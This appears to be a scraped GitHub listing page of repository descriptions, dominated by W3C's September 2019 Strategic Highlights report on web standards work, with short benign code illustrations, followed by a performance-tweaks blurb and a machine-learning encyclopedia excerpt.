26 skills found
jettbrains / W3C Strategic Highlights September 2019. This report was prepared for the September 2019 W3C Advisory Committee Meeting (W3C Member link). See the accompanying W3C Fact Sheet — September 2019. For the previous edition, see the April 2019 W3C Strategic Highlights. For future editions of this report, please consult the latest version. A Chinese translation is available. Contents: Introduction; Future Web Standards; Meeting Industry Needs (Web Payments, Digital Publishing, Media and Entertainment, Web & Telecommunications, Real-Time Communications (WebRTC), Web & Networks, Automotive, Web of Things); Strengthening the Core of the Web (HTML, CSS, Fonts, SVG, Audio); Performance (Web Performance, WebAssembly); Testing (Browser Testing and Tools, WebPlatform Tests); Web of Data; Web for All (Security, Privacy, Identity; Internationalization (i18n); Web Accessibility); Outreach to the world (W3C Developer Relations, W3C Training, Translations, W3C Liaisons). Introduction. This report highlights recent work to enhance the existing landscape of the Web platform and to innovate for the growth and strength of the Web. 33 working groups and a dozen interest groups enable W3C to pursue its mission through the creation of Web standards, guidelines, and supporting materials. We track the tremendous work done across the Consortium through homogeneous workspaces in GitHub, which enables better monitoring and management. We are in the middle of a period where we are chartering numerous working groups, which demonstrates the rapid pace of change for the Web platform: After 4 years, we are nearly ready to publish a Payment Request API Proposed Recommendation and will soon need to charter follow-on work. In the last year we chartered the Web Payment Security Interest Group. In the last year we chartered the Web Media Working Group with 7 specifications for next generation Media support on the Web. We have Accessibility Guidelines under W3C Member review which includes Silver, a new approach. We have just launched the Decentralized Identifier Working Group, which has tremendous potential because a Decentralized Identifier (DID) is an identifier that is globally unique, resolvable with high availability, and cryptographically verifiable. We have Privacy IG (PING) under W3C Member review which strengthens our focus on the tradeoff between privacy and function. We have a new CSS charter under W3C Member review which maps the group's work for the next three years. In this period, W3C and the WHATWG have successfully completed the negotiation of a Memorandum of Understanding rooted in the mutual belief that having two distinct specifications claiming to be normative is generally harmful for the Web community. The MOU, signed last May, describes how the two organizations are to collaborate on the development of a single authoritative version of the HTML and DOM specifications. W3C subsequently rechartered the HTML Working Group to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and for the production of W3C Recommendations from WHATWG Review Drafts. As the Web evolves continuously, some groups are looking for ways for specifications to do so as well. So-called "evergreen recommendations" or "living standards" aim to track continuous development (and maintenance) of features, on a feature-by-feature basis, while getting review and patent commitments. We see the maturation and further development of an incredible number of new technologies coming to the Web. 
Continued progress in many areas demonstrates the vitality of the W3C and the Web community, as the rest of the report illustrates. Future Web Standards W3C has a variety of mechanisms for listening to what the community thinks could become good future Web standards. These include discussions with the Membership, discussions with other standards bodies, the activities of thousands of participants in over 300 community groups, and W3C Workshops. There are lots of good ideas. The W3C strategy team has been identifying promising topics and invites public participation. Future, recent and under consideration Workshops include: Inclusive XR (5-6 November 2019, Seattle, WA, USA) to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive, including to people with disabilities; W3C Workshop on Data Models for Transportation (12-13 September 2019, Palo Alto, CA, USA) W3C Workshop on Web Games (27-28 June 2019, Redmond, WA, USA), view report Second W3C Workshop on the Web of Things (3-5 June 2019, Munich, Germany) W3C Workshop on Web Standardization for Graph Data; Creating Bridges: RDF, Property Graph and SQL (4-6 March 2019, Berlin, Germany), view report Web & Machine Learning. The Strategy Funnel documents the staff's exploration of potential new work at various phases: Exploration and Investigation, Incubation and Evaluation, and eventually to the chartering of a new standards group. The Funnel view is a GitHub Project where new area are issues represented by “cards” which move through the columns, usually from left to right. Most cards start in Exploration and move towards Chartering, or move out of the funnel. Public input is welcome at any stage but particularly once Incubation has begun. This helps W3C identify work that is sufficiently incubated to warrant standardization, to review the ecosystem around the work and indicate interest in participating in its standardization, and then to draft a charter that reflects an appropriate scope. Ongoing feedback can speed up the overall standardization process. Since the previous highlights document, W3C has chartered a number of groups, and started discussion on many more: Newly Chartered or Rechartered Web Application Security WG (03-Apr) Web Payment Security IG (17-Apr) Patent and Standards IG (24-Apr) Web Applications WG (14-May) Web & Networks IG (16-May) Media WG (23-May) Media and Entertainment IG (06-Jun) HTML WG (06-Jun) Decentralized Identifier WG (05-Sep) Extended Privacy IG (PING) (30-Sep) Verifiable Claims WG (30-Sep) Service Workers WG (31-Dec) Dataset Exchange WG (31-Dec) Web of Things Working Group (31-Dec) Web Audio Working Group (31-Dec) Proposed charters / Advance Notice Accessibility Guidelines WG Privacy IG (PING) RDF Literal Direction WG Timed Text WG CSS WG Web Authentication WG Closed Internationalization Tag Set IG Meeting Industry Needs Web Payments All Web Payments specifications W3C's payments standards enable a streamlined checkout experience, enabling a consistent user experience across the Web with lower front end development costs for merchants. Users can store and reuse information and more quickly and accurately complete online transactions. The Web Payments Working Group has republished Payment Request API as a Candidate Recommendation, aiming to publish a Proposed Recommendation in the Fall 2019, and is discussing use cases and features for Payment Request after publication of the 1.0 Recommendation. 
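As a rough illustration of the checkout flow this enables, here is a minimal sketch of a merchant page invoking Payment Request API; the payment method URL, amounts, and the processing step are placeholders rather than anything taken from the specification or a W3C example.

```typescript
// Minimal sketch of invoking the Payment Request API from a checkout page.
// The payment method identifier and totals below are illustrative only.
async function checkout(): Promise<void> {
  const methods: PaymentMethodData[] = [
    { supportedMethods: "https://example.com/pay" }, // hypothetical payment method URL
  ];
  const details: PaymentDetailsInit = {
    total: { label: "Order total", amount: { currency: "USD", value: "64.00" } },
  };
  const request = new PaymentRequest(methods, details);
  if (await request.canMakePayment()) {
    const response = await request.show(); // browser-native payment sheet
    // ...send response.details to the payment processor here (placeholder)...
    await response.complete("success");    // close the sheet
  }
}
```

The browser supplies the payment sheet and any stored user data; the merchant page only describes what is being paid for and which payment methods it accepts.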
Browser vendors have been finalizing implementation of features added in the past year (view the implementation report). As work continues on the Payment Handler API and its implementation (currently in Chrome and Edge Canary), one focus in 2019 is to increase adoption in other browsers. Recently, Mastercard demonstrated the use of Payment Request API to carry out EMVCo's Secure Remote Commerce (SRC) protocol, whose payment method definition is being developed with active participation by Visa, Mastercard, American Express, and Discover. Payment method availability is a key factor in merchant considerations about adopting Payment Request API. The ability to get uniform adoption of a new payment method such as Secure Remote Commerce (SRC) also depends on the availability of the Payment Handler API in browsers, or of proprietary alternatives. Web Monetization, which the Web Payments Working Group will discuss again at its face-to-face meeting in September, can be used to enable micropayments as an alternative revenue stream to advertising. Since the beginning of 2019, Amazon, Brave Software, JCB, Certus Cybersecurity Solutions and Netflix have joined the Web Payments Working Group. In April, W3C launched the Web Payment Security Interest Group to enable W3C, EMVCo, and the FIDO Alliance to collaborate on a vision for Web payment security and interoperability. Participants will define areas of collaboration and identify gaps between existing technical specifications in order to increase compatibility among different technologies, such as: How do SRC, FIDO, and Payment Request relate? The Payment Services Directive 2 (PSD2) regulations in Europe are scheduled to take effect in September 2019. What is the role of EMVCo, W3C, and FIDO technologies, and what is the current state of readiness for the deadline? How can we improve privacy on the Web at the same time as we meet industry requirements regarding user identity? Digital Publishing. All Digital Publishing specifications, Publication milestones. The Web is the universal publishing platform. Publishing is increasingly impacted by the Web, and the Web increasingly impacts Publishing. Topics of particular interest to Publishing@W3C include typography and layout, accessibility, usability, portability, distribution, archiving, offline access, print on demand, and reliable cross-referencing. The diverse publishing community represented in the groups consists of traditional "trade" publishers and ebook reading system manufacturers, but also publishers of audiobooks, scholarly journals and educational materials, as well as library scientists and browser developers. The Publishing Working Group currently concentrates on audiobooks, which lack a comprehensive standard, thus incurring extra costs and time to publish in this booming market. Active development is ongoing on the future standard: Publication Manifest, the Audiobook profile for Web Publications, and the Lightweight Packaging Format (see the illustrative manifest sketch below). The BD Comics Manga Community Group, the Synchronized Multimedia for Publications Community Group, the Publishing Community Group and a future group on archival are companions to the working group where specific work is developed and incubated. The Publishing Community Group is a recently launched incubation channel for Publishing@W3C. The goal of the group is to propose, document, and prototype features broadly related to publications on the Web, reading modes and systems, and the user experience of publications. The EPUB 3 Community Group has successfully completed the revision of EPUB 3.2. 
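To make the audiobook work above more concrete, the sketch below shows, as a TypeScript object, the general shape of a JSON-LD publication manifest with a reading order of audio resources. It is loosely modeled on the in-progress Publication Manifest and Audiobooks drafts; the title, file names, durations and the exact property set are illustrative assumptions, not normative spec content.

```typescript
// Illustrative publication-manifest shape (not normative): metadata plus a
// reading order of audio resources, expressed as JSON-LD-style data.
const audiobookManifest = {
  "@context": ["https://schema.org", "https://www.w3.org/ns/pub-context"],
  type: "Audiobook",
  name: "An Example Audiobook", // placeholder title
  readingOrder: [
    { url: "chapter-001.mp3", encodingFormat: "audio/mpeg", duration: "PT1800S" },
    { url: "chapter-002.mp3", encodingFormat: "audio/mpeg", duration: "PT2112S" },
  ],
};

// A reading system would fetch such a manifest and queue the readingOrder
// resources for playback in sequence.
console.log(JSON.stringify(audiobookManifest, null, 2));
```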
The Publishing Business Group fosters ongoing participation by members of the publishing industry and the overall ecosystem in the development of Web infrastructure to better support the needs of the industry. The Business Group serves as an additional conduit to the Publishing Working Group and several Community Groups for feedback between the publishing ecosystem and W3C. The Publishing BG has played a vital role in fostering and advancing the adoption and continued development of EPUB 3. In particular, the BG provided critical support to the update of EPUBCheck to validate EPUB content against the new EPUB 3.2 specification. This resulted in the development, in conjunction with the EPUB 3 Community Group, of a new generation of EPUBCheck, i.e., the production-ready EPUBCheck 4.2 release. Media and Entertainment. All Media specifications. The Media and Entertainment vertical tracks media-related topics and features that create immersive experiences for end users. HTML5 brought standard audio and video elements to the Web. Standardization activities since then have aimed at turning the Web into a professional platform fully suitable for the delivery of media content and associated materials, adding previously missing features needed to stream video content on the Web, such as adaptive streaming and content protection. Together with Microsoft, Comcast, Netflix and Google, W3C received a Technology & Engineering Emmy Award in April 2019 for standardization of a full TV experience on the Web. Current goals are to: Reinforce core media technologies: creation of the Media Working Group, to develop media-related specifications incubated in the WICG (e.g. Media Capabilities, Picture-in-Picture, Media Session) and to maintain and evolve Media Source Extensions (MSE) and Encrypted Media Extensions (EME). Improve support for Media Timed Events: data cues incubation. Enhance color support (HDR, wide gamut), in scope of the CSS WG and in the Color on the Web CG. Reduce fragmentation: continue annual releases of a common and testable baseline for media devices, in scope of the Web Media APIs CG and in collaboration with the CTA WAVE Project. Maintain the Roadmap of Media Technologies for the Web, which highlights Web technologies that can be used to build media applications and services, as well as known gaps to enable additional use cases. Create the future: discuss perspectives for Media and Entertainment for the Web. Bring the power of GPUs to the Web (graphics, machine learning, heavy processing), under incubation in the GPU for the Web CG; transition to a Working Group is under discussion. Determine next steps after the successful W3C Workshop on Web Games of June 2019 (view the report). Timed Text. The Timed Text Working Group develops and maintains formats used for the representation of text synchronized with other timed media, like audio and video, and notably works on TTML, profiles of TTML, and WebVTT. Recent progress includes: a robust WebVTT implementation report poises the specification for publication as a Proposed Recommendation; discussions around re-chartering, notably to add a TTML Profile for Audio Description deliverable to the scope of the group, and to clarify that rendering of captions within XR content is also in scope. Immersive Web. Hardware that enables Virtual Reality (VR) and Augmented Reality (AR) applications is now broadly available to consumers, offering an immersive computing platform with both new opportunities and challenges. 
The ability to interact directly with immersive hardware is critical to ensuring that the web is well equipped to operate as a first-class citizen in this environment. The Immersive Web Working Group has been stabilizing the WebXR Device API while the companion Immersive Web Community Group incubates the next series of features identified as key for the future of the Immersive Web. W3C plans a workshop focused on the needs and benefits at the intersection of VR & Accessibility (Inclusive XR), on 5-6 November 2019 in Seattle, WA, USA, to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive. Web & Telecommunications The Web is the Open Platform for Mobile. Telecommunication service providers and network equipment providers have long been critical actors in the deployment of Web technologies. As the Web platform matures, it brings richer and richer capabilities to extend existing services to new users and devices, and propose new and innovative services. Real-Time Communications (WebRTC) All Real-Time Communications specifications WebRTC has reshaped the whole communication landscape by making any connected device a potential communication end-point, bringing audio and video communications anywhere, on any network, vastly expanding the ability of operators to reach their customers. WebRTC serves as the corner-stone of many online communication and collaboration services. The WebRTC Working Group aims to bringing WebRTC 1.0 (and companion specification Media Capture and Streams) to Recommendation by the end of 2019. Intense efforts are focused on testing (supported by a dedicated hackathon at IETF 104) and interoperability. The group is considering pushing features that have not gotten enough traction to separate modules or to a later minor revision of the spec. Beyond WebRTC 1.0, the WebRTC Working Group will focus its efforts on WebRTC NV which the group has started documenting by identifying use cases. Web & Networks Recently launched, in the wake of the May 2018 Web5G workshop, the Web & Networks Interest Group is chaired by representatives from AT&T, China Mobile and Intel, with a goal to explore solutions for web applications to achieve better performance and resource allocation, both on the device and network. The group's first efforts are around use cases, privacy & security requirements and liaisons. Automotive All Automotive specifications To create a rich application ecosystem for vehicles and other devices allowed to connect to the vehicle, the W3C Automotive Working Group is delivering a service specification to expose all common vehicle signals (engine temperature, fuel/charge level, range, tire pressure, speed, etc.) The Vehicle Information Service Specification (VISS), which is a Candidate Recommendation, is seeing more implementations across the industry. It provides the access method to a common data model for all the vehicle signals –presently encapsulating a thousand or so different data elements– and will be growing to accommodate the advances in automotive such as autonomous and driver assist technologies and electrification. The group is already working on a successor to VISS, leveraging the underlying data model and the VIWI submission from Volkswagen, for a more robust means of accessing vehicle signals information and the same paradigm for other automotive needs including location-based services, media, notifications and caching content. 
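As a hedged sketch of what client access under this model might look like: VISS defines JSON requests over a WebSocket connection against a tree of vehicle signals. The endpoint URL, signal path and message fields below are illustrative assumptions for the sketch, not text copied from the specification.

```typescript
// Sketch of a VISS-style client (illustrative only): request a single vehicle
// signal over WebSocket and log whatever the service returns.
const socket = new WebSocket("wss://vehicle.example/viss"); // hypothetical endpoint

socket.addEventListener("open", () => {
  socket.send(JSON.stringify({
    action: "get",                                // read a signal value
    path: "Signal.Drivetrain.FuelSystem.Level",   // illustrative signal path
    requestId: "42",
  }));
});

socket.addEventListener("message", (event) => {
  console.log("vehicle signal response:", event.data);
});
```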
The Automotive and Web Platform Business Group acts as an incubator for prospective standards work. One of its task forces is using W3C VISS in performing data sampling and off-boarding the information to the cloud. Access to the wealth of information that W3C's auto signals standard exposes is of interest to regulators, urban planners, insurance companies, auto manufacturers, fleet managers and owners, service providers and others. In addition to components needed for data sampling and edge computing, capturing user and owner consent, information collection methods and handling of data are in scope. The upcoming W3C Workshop on Data Models for Transportation (September 2019) is expected to focus on the need of additional ontologies around transportation space. Web of Things All Web of Things specifications W3C's Web of Things work is designed to bridge disparate technology stacks to allow devices to work together and achieve scale, thus enabling the potential of the Internet of Things by eliminating fragmentation and fostering interoperability. Thing descriptions expressed in JSON-LD cover the behavior, interaction affordances, data schema, security configuration, and protocol bindings. The Web of Things complements existing IoT ecosystems to reduce the cost and risk for suppliers and consumers of applications that create value by combining multiple devices and information services. There are many sectors that will benefit, e.g. smart homes, smart cities, smart industry, smart agriculture, smart healthcare and many more. The Web of Things Working Group is finishing the initial Web of Things standards, with support from the Web of Things Interest Group: Web of Things Architecture Thing Descriptions Strengthening the Core of the Web HTML The HTML Working Group was chartered early June to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and to produce W3C Recommendations from WHATWG Review Drafts. A few days before, W3C and the WHATWG signed a Memorandum of Understanding outlining the agreement to collaborate on the development of a single version of the HTML and DOM specifications. Issues and proposed solutions for HTML and DOM done via the newly rechartered HTML Working Group in the WHATWG repositories The HTML Working Group is targetting November 2019 to bring HTML and DOM to Candidate Recommendations. CSS All CSS specifications CSS is a critical part of the Open Web Platform. The CSS Working Group gathers requirements from two large groups of CSS users: the publishing industry and application developers. Within W3C, those groups are exemplified by the Publishing groups and the Web Platform Working Group. The former requires things like better pagination support and advanced font handling, the latter needs intelligent (and fast!) scrolling and animations. What we know as CSS is actually a collection of almost a hundred specifications, referred to as ‘modules’. The current state of CSS is defined by a snapshot, updated once a year. The group also publishes an index defining every term defined by CSS specifications. Fonts All Fonts specifications The Web Fonts Working Group develops specifications that allow the interoperable deployment of downloadable fonts on the Web, with a focus on Progressive Font Enrichment as well as maintenance of WOFF Recommendations. 
Recent and ongoing work includes: Early API experiments by Adobe and Monotype have demonstrated the feasibility of a font enrichment API, where a server delivers a font with minimal glyph repertoire and the client can query the full repertoire and request additional subsets on-the-fly. In other experiments, the Brotli compression used in WOFF 2 was extended to support shared dictionaries and patch update. Metrics to quantify improvement are a current hot discussion topic. The group will meet at ATypi 2019 in Japan, to gather requirements from the international typography community. The group will first produce a report summarizing the strengths and weaknesses of each prototype solution by Q2 2020. SVG All SVG specifications SVG is an important and widely-used part of the Open Web Platform. The SVG Working Group focuses on aligning the SVG 2.0 specification with browser implementations, having split the specification into a currently-implemented 2.0 and a forward-looking 2.1. Current activity is on stabilization, increased integration with the Open Web Platform, and test coverage analysis. The Working Group was rechartered in March 2019. A new work item concerns native (non-Web-browser) uses of SVG as a non-interactive, vector graphics format. Audio The Web Audio Working Group was extended to finish its work on the Web Audio API, expecting to publish it as a Recommendation by year end. The specification enables synthesizing audio in the browser. Audio operations are performed with audio nodes, which are linked together to form a modular audio routing graph. Multiple sources — with different types of channel layout — are supported. This modular design provides the flexibility to create complex audio functions with dynamic effects. The first version of Web Audio API is now feature complete and is implemented in all modern browsers. Work has started on the next version, and new features are being incubated in the Audio Community Group. Performance Web Performance All Web Performance specifications There are currently 18 specifications in development in the Web Performance Working Group aiming to provide methods to observe and improve aspects of application performance of user agent features and APIs. The W3C team is looking at related work incubated in the W3C GPU for the Web (WebGPU) Community Group which is poised to transition to a W3C Working Group. A preliminary draft charter is available. WebAssembly All WebAssembly specifications WebAssembly improves Web performance and power by being a virtual machine and execution environment enabling loaded pages to run native (compiled) code. It is deployed in Firefox, Edge, Safari and Chrome. The specification will soon reach Candidate Recommendation. WebAssembly enables near-native performance, optimized load time, and perhaps most importantly, a compilation target for existing code bases. While it has a small number of native types, much of the performance increase relative to Javascript derives from its use of consistent typing. WebAssembly leverages decades of optimization for compiled languages and the byte code is optimized for compactness and streaming (the web page starts executing while the rest of the code downloads). Network and API access all occurs through accompanying Javascript libraries -- the security model is identical to that of Javascript. 
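To illustrate the deployment model just described, here is a small sketch of loading a module through the WebAssembly JavaScript API; the module file name and its exported add function are placeholders.

```typescript
// Sketch of the WebAssembly JavaScript API described above: compilation can
// begin while the module streams in, and all I/O goes through the JS imports.
// "module.wasm" and its exported "add" function are placeholders.
async function runWasm(): Promise<void> {
  const imports = { env: { log: (x: number) => console.log("from wasm:", x) } };
  const { instance } = await WebAssembly.instantiateStreaming(fetch("module.wasm"), imports);
  const add = instance.exports.add as (a: number, b: number) => number;
  console.log(add(2, 3)); // near-native arithmetic, same security model as JS
}
```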
Requirements gathering and language development occur in the Community Group, while the Working Group manages test development, community review and progression of specifications on the Recommendation Track. Testing. Browser testing plays a critical role in the growth of the Web by: improving the reliability of Web technology definitions; improving the quality of implementations of these technologies by helping vendors to detect bugs in their products; and improving the data available to Web developers on known bugs and deficiencies of Web technologies by publishing results of these tests. Browser Testing and Tools. The Browser Testing and Tools Working Group is developing WebDriver version 2, having published the W3C Recommendation of WebDriver last year. WebDriver acts as a remote control interface that enables introspection and control of user agents, provides a platform- and language-neutral wire protocol as a way for out-of-process programs to remotely instruct the behavior of Web browsers, and emulates the actions of a real person using the browser. WebPlatform Tests. The WebPlatform Tests project now provides a mechanism, TestDriver, that allows tests that previously needed to be run manually to be fully automated. TestDriver enables sending trusted key and mouse events, sending complex series of trusted pointer and key interactions for things like in-content drag-and-drop or pinch zoom, and even file upload. In 2014, W3C began work on this coordinated open-source effort to build a cross-browser test suite for the Web Platform, which the WHATWG and all major browsers have adopted. Web of Data. All Data specifications. There have been several great success stories around the standardization of data on the web over the past year. Verifiable Claims seems to have significant uptake. It is also significant that the Decentralized Identifier WG charter has received numerous favorable reviews, and the group was just recently launched. JSON-LD has been a major success, with large-scale deployment on Web sites via schema.org (a small illustrative sketch appears a few paragraphs below). JSON-LD 1.1 has completed technical work and is about to transition to CR. More than 25% of websites today include schema.org data in JSON-LD. The Web of Things Thing Description has been in CR since May, making use of JSON-LD. The Verifiable Credentials data model has been in CR since July, also making use of JSON-LD. There is continued strong interest in decentralized identifiers, and engagement from the TAG with reframing core documents, such as Ethical Web Principles, to include data on the web within their scope. Data is increasingly important for all organizations, especially with the rise of IoT and Big Data. W3C has a mature and extensive suite of standards relating to data, developed over two decades of experience, with plans for further work on making it easier for developers to work with graph data and knowledge graphs. Linked Data is about the use of URIs as names for things, the ability to dereference these URIs to get further information, and the inclusion of links to other data. There are ever-increasing sources of open Linked Data on the Web, as well as data services that are restricted to the suppliers and consumers of those services. The digital transformation of industry is seeking to exploit advanced digital technologies. This will enable businesses to integrate horizontally along the supply and value chains, and vertically from the factory floor to the office floor. W3C is seeking to make it easier to support enterprise-wide data management and governance, reflecting the strategic importance of data to modern businesses. 
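Here is the small schema.org/JSON-LD sketch promised above: a page can describe an entity with dereferenceable URIs and embed the description in a script element for crawlers to read. The organization name, URL and identifier are invented for illustration.

```typescript
// Sketch: embedding a schema.org description as JSON-LD in a page.
// Every name and URL here is a placeholder.
const orgDescription = {
  "@context": "https://schema.org",
  "@type": "Organization",
  name: "Example Consortium",
  url: "https://example.org/",
  sameAs: ["https://www.wikidata.org/entity/Q0"], // hypothetical linked-data identifier
};

const script = document.createElement("script");
script.type = "application/ld+json";
script.textContent = JSON.stringify(orgDescription);
document.head.appendChild(script); // crawlers read this block as structured data
```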
Traditional approaches to data have focused on tabular databases (SQL/RDBMS), Comma Separated Value (CSV) files, and data embedded in PDF documents and spreadsheets. We're now in midst of a major shift to graph data with nodes and labeled directed links between them. Graph data is: Faster than using SQL and associated JOIN operations More favorable to integrating data from heterogeneous sources Better suited to situations where the data model is evolving In the wake of the recent W3C Workshop on Graph Data we are in the process of launching a Graph Standardization Business Group to provide a business perspective with use cases and requirements, to coordinate technical standards work and liaisons with external organizations. Web for All Security, Privacy, Identity All Security specifications, all Privacy specifications Authentication on the Web As the WebAuthn Level 1 W3C Recommendation published last March is seeing wide implementation and adoption of strong cryptographic authentication, work is proceeding on Level 2. The open standard Web API gives native authentication technology built into native platforms, browsers, operating systems (including mobile) and hardware, offering protection against hacking, credential theft, phishing attacks, thus aiming to end the era of passwords as a security construct. You may read more in our March press release. Privacy An increasing number of W3C specifications are benefitting from Privacy and Security review; there are security and privacy aspects to every specification. Early review is essential. Working with the TAG, the Privacy Interest Group has updated the Self-Review Questionnaire: Security and Privacy. Other recent work of the group includes public blogging further to the exploration of anti-patterns in standards and permission prompts. Security The Web Application Security Working Group adopted Feature Policy, aiming to allow developers to selectively enable, disable, or modify the behavior of some of these browser features and APIs within their application; and Fetch Metadata, aiming to provide servers with enough information to make a priori decisions about whether or not to service a request based on the way it was made, and the context in which it will be used. The Web Payment Security Interest Group, launched last April, convenes members from W3C, EMVCo, and the FIDO Alliance to discuss cooperative work to enhance the security and interoperability of Web payments (read more about payments). Internationalization (i18n) All Internationalization specifications, educational articles related to Internationalization, spec developers checklist Only a quarter or so current Web users use English online and that proportion will continue to decrease as the Web reaches more and more communities of limited English proficiency. If the Web is to live up to the "World Wide" portion of its name, and for the Web to truly work for stakeholders all around the world engaging with content in various languages, it must support the needs of worldwide users as they engage with content in the various languages. The growth of epublishing also brings requirements for new features and improved typography on the Web. It is important to ensure the needs of local communities are captured. The W3C Internationalization Initiative was set up to increase in-house resources dedicated to accelerating progress in making the World Wide Web "worldwide" by gathering user requirements, supporting developers, and education & outreach. 
For an overview of current projects see the i18n radar. W3C's Internationalization efforts progressed on a number of fronts recently: Requirements: new African and European language groups will work on the gap analysis, errata and layout requirements. Gap analysis: Japanese, Devanagari, Bengali, Tamil, Lao, Khmer, Javanese, and Ethiopic were updated in the gap-analysis documents. Layout requirements document: notable progress tracked in the Southeast Asian Task Force while work continues on Chinese layout requirements. Developer support: Spec reviews: the i18n WG continues active review of specifications of the WHATWG and other W3C Working Groups. Short review checklist: an easy way to begin a self-review that helps spec developers understand what aspects of their spec are likely to need attention for internationalization, and points them to more detailed checklists for the relevant topics. It also helps those reviewing specs for i18n issues. Strings on the Web: Language and Direction Metadata lays out issues and discusses potential solutions for passing information about language and direction with strings in JSON or other data formats. The document was rewritten for clarity, and expanded. The group is collaborating with the JSON-LD and Web Publishing groups to develop a plan for updating RDF, JSON-LD and related specifications to handle metadata for the base direction of text (bidi). User-friendly test format: a new format was developed for Internationalization Test Suite tests, which displays helpful information about how the test works. This is particularly useful because those tests are pointed to by educational materials and gap-analysis documents. Web Platform Tests: a large number of tests in the i18n test suite have been ported to the WPT repository, including css-counter-styles, css-ruby, css-syntax, css-text, css-text-decor, css-writing-modes, and css-pseudo. Education & outreach: for all educational materials, see the HTML & CSS Authoring Techniques. Web Accessibility. All Accessibility specifications, WAI resources. The Web Accessibility Initiative supports W3C's Web for All mission. Recent achievements include: Education and training: Inaccessibility of CAPTCHA was updated to bring our analysis and recommendations up to date with CAPTCHA practice today, concluding two years of extensive work and invaluable input from the public (read more on the W3C Blog). Learn why your web content and applications should be accessible. The Education and Outreach Working Group has completed revision and updating of the Business Case for Digital Accessibility. Accessibility guidelines: the Accessibility Guidelines Working Group has continued to update WCAG Techniques and Understanding WCAG 2.1, and published a Candidate Recommendation of Accessibility Conformance Testing Rules Format 1.0 to improve inter-rater reliability when evaluating conformance of web content to WCAG. An updated charter is being developed to host work on WCAG 2.2 and on "Silver", the next generation of accessibility guidelines. There are accessibility aspects to most specifications. Check your work with the FAST checklist. 
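As a deliberately tiny, generic illustration of the kind of technique the WCAG Techniques documents cover (this snippet is not taken from them): an icon-only control can be given an accessible name so assistive technology has something to announce. The button and label here are invented.

```typescript
// Give an icon-only button an accessible name (a common WCAG/ARIA technique).
const searchButton = document.createElement("button");
searchButton.textContent = "🔍";                    // visible icon only
searchButton.setAttribute("aria-label", "Search");  // name announced by screen readers
document.body.appendChild(searchButton);
```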
Outreach to the world. W3C Developer Relations. To foster the excellent feedback loop between Web Standards development and Web developers, and to grow participation from that diverse community, recent W3C Developer Relations activities include: @w3cdevs tracks the enormous amount of work happening across W3C; the W3C Track during the Web Conference 2019 in San Francisco; tech videos: W3C published the 2019 Web Games Workshop videos; the 16 September 2019 Developer Meetup in Fukuoka, Japan, is open to all and will combine a set of technical demos prepared by W3C groups and a series of talks on a selected set of W3C technologies and projects; and W3C is involved with Mozilla, Google, Samsung, Microsoft and Bocoup in the organization of ViewSource 2019 in Amsterdam (read more on the W3C Blog). W3C Training. In partnership with edX, W3C's MOOC training program, W3Cx, offers a complete "Front-End Web Developer" (FEWD) professional certificate program that consists of a suite of five courses on the foundational languages that power the Web: HTML5, CSS and JavaScript. We count nearly 900K students from all over the world. Translations. Many Web users rely on translations of documents developed at W3C, whose official language is English. W3C is extremely grateful for the continuous efforts of its community in ensuring that our various deliverables in general, and our specifications in particular, are made available in other languages, for free, ensuring their exposure to a much more diverse set of readers. Last spring we developed a more robust system and a new listing of translations of W3C specifications, and updated the instructions on how to contribute to our translation efforts. W3C Liaisons. Liaisons and coordination with numerous organizations and Standards Development Organizations (SDOs) are crucial for W3C to: make sure standards are interoperable; coordinate our respective agendas in Internet governance (W3C participates in ICANN, GIPO, IGF, and the I* organizations: ICANN, IETF, ISOC, IAB); ensure at the government liaison level that our standards work is officially recognized when important to our membership, so that products based on them (often made by our members) are part of procurement orders (W3C has ARO/PAS status with ISO, and participates in the EU MSP and Rolling Plan on Standardization); ensure the global set of Web and Internet standards forms a compatible stack of technologies, at the technical and policy level (patent regime, fragmentation, use in policy making); and promote Standards adoption equally by the industry, the public sector, and the public at large. Coralie Mercier, Editor, W3C Marketing & Communications. Copyright © 2019 W3C ® (MIT, ERCIM, Keio, Beihang) Usage policies apply.
AlchemyTweaks / Verified Tweaks: The "Verified Tweaks" section includes empirically validated system configurations, derived from controlled benchmarking scenarios and frame-level telemetry analysis. Each modification has been replicated, documented, and verified through captured test sessions, ensuring methodological rigor and reliable performance impact.
Aryia-Behroziuan / NeuronsAn ANN is a model based on a collection of connected units or nodes called "artificial neurons", which loosely model the neurons in a biological brain. Each connection, like the synapses in a biological brain, can transmit information, a "signal", from one artificial neuron to another. An artificial neuron that receives a signal can process it and then signal additional artificial neurons connected to it. In common ANN implementations, the signal at a connection between artificial neurons is a real number, and the output of each artificial neuron is computed by some non-linear function of the sum of its inputs. The connections between artificial neurons are called "edges". Artificial neurons and edges typically have a weight that adjusts as learning proceeds. The weight increases or decreases the strength of the signal at a connection. Artificial neurons may have a threshold such that the signal is only sent if the aggregate signal crosses that threshold. Typically, artificial neurons are aggregated into layers. Different layers may perform different kinds of transformations on their inputs. Signals travel from the first layer (the input layer) to the last layer (the output layer), possibly after traversing the layers multiple times. The original goal of the ANN approach was to solve problems in the same way that a human brain would. However, over time, attention moved to performing specific tasks, leading to deviations from biology. Artificial neural networks have been used on a variety of tasks, including computer vision, speech recognition, machine translation, social network filtering, playing board and video games and medical diagnosis. Deep learning consists of multiple hidden layers in an artificial neural network. This approach tries to model the way the human brain processes light and sound into vision and hearing. Some successful applications of deep learning are computer vision and speech recognition.[68] Decision trees Main article: Decision tree learning Decision tree learning uses a decision tree as a predictive model to go from observations about an item (represented in the branches) to conclusions about the item's target value (represented in the leaves). It is one of the predictive modeling approaches used in statistics, data mining, and machine learning. Tree models where the target variable can take a discrete set of values are called classification trees; in these tree structures, leaves represent class labels and branches represent conjunctions of features that lead to those class labels. Decision trees where the target variable can take continuous values (typically real numbers) are called regression trees. In decision analysis, a decision tree can be used to visually and explicitly represent decisions and decision making. In data mining, a decision tree describes data, but the resulting classification tree can be an input for decision making. Support vector machines Main article: Support vector machines Support vector machines (SVMs), also known as support vector networks, are a set of related supervised learning methods used for classification and regression. Given a set of training examples, each marked as belonging to one of two categories, an SVM training algorithm builds a model that predicts whether a new example falls into one category or the other.[69] An SVM training algorithm is a non-probabilistic, binary, linear classifier, although methods such as Platt scaling exist to use SVM in a probabilistic classification setting. 
